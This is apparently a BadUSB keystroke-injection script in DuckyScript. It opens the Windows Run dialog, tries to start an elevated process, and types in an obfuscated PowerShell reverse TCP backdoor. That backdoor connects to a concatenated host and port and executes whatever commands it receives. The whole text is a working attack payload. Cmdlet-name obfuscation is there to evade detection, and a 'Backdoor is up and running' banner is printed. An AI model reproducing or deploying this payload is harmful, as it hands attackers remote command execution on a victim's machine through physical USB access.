DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
STRING $a = "127" + "." + "0" + "." + "0" + "." + "1";
ENTER
DELAY 100
STRING $p = 1000 + 1000 + 1000 + 6000;
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "########################################################################";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "#                                                                      #";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "#                        PowerShell Reverse TCP v3.6                   #";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "#                                          by Ivan Sincek              #";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "#                                                                      #";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "# GitHub repository at github.com/ivan-sincek/powershell-reverse-tcp.  #";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "# Feel free to donate bitcoin at 1BrZM6T7G9RN8vbabnfXu4M6Lpgztq6Y14.   #";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "#                                                                      #";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "########################################################################";
ENTER
DELAY 100
STRING $c = $t = $b = $w = $d = $r = $null;
ENTER
DELAY 100
STRING try {
ENTER
DELAY 100
STRING $c = (& (`G`C`M *ke-E*) '& (`G`C`M *ew-O*) `N`E`T`.`S`O`C`K`E`T`S`.`T`C`P`C`L`I`E`N`T($a, $p)');
ENTER
DELAY 100
STRING $t = $c.GetStream();
ENTER
DELAY 100
STRING $b = & (`G`C`M *ew-O*) Byte[] (1024 + 12 - 12);
ENTER
DELAY 100
STRING $e = & (`G`C`M *ew-O*) Text.AsciiEncoding;
ENTER
DELAY 100
STRING $w = (& (`G`C`M *ke-E*) '& (`G`C`M *ew-O*) `I`O`.`S`T`R`E`A`M`W`R`I`T`E`R($t)');
ENTER
DELAY 100
STRING $w.AutoFlush = $true;
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "Backdoor is up and running...";
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "";
ENTER
DELAY 100
STRING $by = 0;
ENTER
DELAY 100
STRING do {
ENTER
DELAY 100
STRING $w.Write("PS>");
ENTER
DELAY 100
STRING do {
ENTER
DELAY 100
STRING $by = $t.Read($b, 0, $b.Length);
ENTER
DELAY 100
STRING if ($by -gt 0) {
ENTER
DELAY 100
STRING $d = $d + $e.GetString($b, 0, $by);
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING } while ($t.DataAvailable);
ENTER
DELAY 100
STRING if ($by -gt 0) {
ENTER
DELAY 100
STRING $d = $d.Trim();
ENTER
DELAY 100
STRING if ($d.Length -gt 0) {
ENTER
DELAY 100
STRING try {
ENTER
DELAY 100
STRING $r = & (`G`C`M *ke-E*) -Command $d 2>&1 | & (`G`C`M *ut-S?????);
ENTER
DELAY 100
STRING } catch {
ENTER
DELAY 100
STRING $r = $_.Exception | & (`G`C`M *ut-S?????);
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "d";
ENTER
DELAY 100
STRING $le = $r.Length;
ENTER
DELAY 100
STRING $co = 0;
ENTER
DELAY 100
STRING $by = $b.Length;
ENTER
DELAY 100
STRING while ($le -gt 0) {
ENTER
DELAY 100
STRING if ($le -lt $b.Length) {
ENTER
DELAY 100
STRING $by = $le;
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING $w.Write($r.substring($co, $by));
ENTER
DELAY 100
STRING $co += $by;
ENTER
DELAY 100
STRING $le -= $by;
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "r";
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING } while ($by -gt 0);
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) "Backdoor will now exit...";
ENTER
DELAY 100
STRING } catch {
ENTER
DELAY 100
STRING & (`G`C`M *e-Ho??) $_.Exception.InnerException.Message;
ENTER
DELAY 100
STRING } finally {
ENTER
DELAY 100
STRING if ($w -ne $null) {
ENTER
DELAY 100
STRING $w.Close(); $w.Dispose();
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "w";
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING if ($t -ne $null) {
ENTER
DELAY 100
STRING $t.Close(); $t.Dispose();
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "t";
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING if ($c -ne $null) {
ENTER
DELAY 100
STRING $c.Close(); $c.Dispose();
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "c";
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING if ($b -ne $null) {
ENTER
DELAY 100
STRING $b.Clear();
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "b";
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING if ($r -ne $null) {
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "r";
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING if ($d -ne $null) {
ENTER
DELAY 100
STRING & (`G`C`M *ar-V*) -Name "d";
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
STRING [SYSTEM.GC]::('COL' + 'LECT')();
ENTER
DELAY 100
STRING }
ENTER
DELAY 100
